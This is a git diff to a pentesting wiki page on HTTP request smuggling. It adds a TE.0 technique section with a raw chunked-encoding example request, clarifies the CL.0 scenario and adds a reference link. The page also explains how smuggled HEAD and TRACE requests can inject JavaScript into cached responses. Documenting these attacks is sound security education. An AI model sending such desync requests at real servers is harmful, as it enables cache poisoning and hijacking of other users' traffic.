diff --git a/pentesting-web/http-request-smuggling/README.md b/pentesting-web/http-request-smuggling/README.md
index 44cf0c324..535f07ed6 100644
--- a/pentesting-web/http-request-smuggling/README.md
+++ b/pentesting-web/http-request-smuggling/README.md
@@ -1,8 +1,8 @@
# HTTP Request Smuggling / HTTP Desync Attack
{% hint style="success" %}
-Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: 
[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: 
[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -60,6 +60,10 @@ HTTP request smuggling attacks are crafted by sending ambiguous requests that ex
+{% hint style="info" %}
+To the previous table you should add the TE.0 technique, like CL.0 technique but using Transfer Encoding.
+{% endhint %}
+
#### CL.TE Vulnerability (Content-Length used by Front-End, Transfer-Encoding used by Back-End)
* **Front-End (CL):** Processes the request based on the `Content-Length` header.
@@ -137,7 +141,7 @@ HTTP request smuggling attacks are crafted by sending ambiguous requests that ex
: chunked
```
-#### **CL.CL Scenario (Content-Length used by both Front-End and Back-End):**
+#### **CL.CL Scenario (Content-Length used by both Front-End and Back-End)**
* Both servers process the request based solely on the `Content-Length` header.
* This scenario typically does not lead to smuggling, as there's alignment in how both servers interpret the request length.
@@ -152,9 +156,9 @@ HTTP request smuggling attacks are crafted by sending ambiguous requests that ex
Normal Request
```
-#### **CL != 0 Scenario:**
+#### **CL.0 Scenario**
-* Refers to scenarios where the `Content-Length` header is present and has a value other than zero, indicating that the request body has content.
+* Refers to scenarios where the `Content-Length` header is present and has a value other than zero, indicating that the request body has content. The back-end ignores the `Content-Length` header (which is treated as 0), but the front-end parses it.
* It's crucial in understanding and crafting smuggling attacks, as it influences how servers determine the end of a request.
* **Example:**
@@ -167,6 +171,30 @@ HTTP request smuggling attacks are crafted by sending ambiguous requests that ex
Non-Empty Body
```
+#### TE.0 Scenario
+
+* Like the previous one but using TE
+* Technique [reported here](https://www.bugcrowd.com/blog/unveiling-te-0-http-request-smuggling-discovering-a-critical-vulnerability-in-thousands-of-google-cloud-websites/)
+* **Example**:
+
+```
+OPTIONS / HTTP/1.1
+Host: {HOST}
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
+Transfer-Encoding: chunked
+Connection: keep-alive
+
+50
+GET HTTP/1.1
+x: X
+0
+EMPTY_LINE_HERE
+EMPTY_LINE_HERE
+```
+
#### Breaking the web server
This technique is also useful in scenarios where it's possible to **break a web server while reading the initial HTTP data** but **without closing the connection**. This way, the **body** of the HTTP request will be considered the **next HTTP request**.
@@ -550,7 +578,7 @@ X-Forwarded-For: xxx.xxx.xxx.xxx
```
An example on how to abuse this behaviour would be to **smuggle first a HEAD request**. This request will be responded with only the **headers** of a GET request (**`Content-Type`** among them). And smuggle **immediately after the HEAD a TRACE request**, which will be **reflecting the sent dat**a.\
-As the HEAD response will be containing a `Content-Length` header, the **response of the TRACE request will be treated as the body of the HEAD response, therefore reflecting arbitrary data** in the response. \
+As the HEAD response will be containing a `Content-Length` header, the **response of the TRACE request will be treated as the body of the HEAD response, therefore reflecting arbitrary data** in the response.\
This response will be sent to the next request over the connection, so this could be **used in a cached JS file for example to inject arbitrary JS code**.
### Abusing TRACE via HTTP Response Splitting
@@ -735,10 +763,11 @@ def handleResponse(req, interesting):
* [https://memn0ps.github.io/2019/11/02/HTTP-Request-Smuggling-CL-TE.html](https://memn0ps.github.io/2019/11/02/HTTP-Request-Smuggling-CL-TE.html)
* [https://standoff365.com/phdays10/schedule/tech/http-request-smuggling-via-higher-http-versions/](https://standoff365.com/phdays10/schedule/tech/http-request-smuggling-via-higher-http-versions/)
* [https://portswigger.net/research/trace-desync-attack](https://portswigger.net/research/trace-desync-attack)
+* [https://www.bugcrowd.com/blog/unveiling-te-0-http-request-smuggling-discovering-a-critical-vulnerability-in-thousands-of-google-cloud-websites/](https://www.bugcrowd.com/blog/unveiling-te-0-http-request-smuggling-discovering-a-critical-vulnerability-in-thousands-of-google-cloud-websites/)
{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)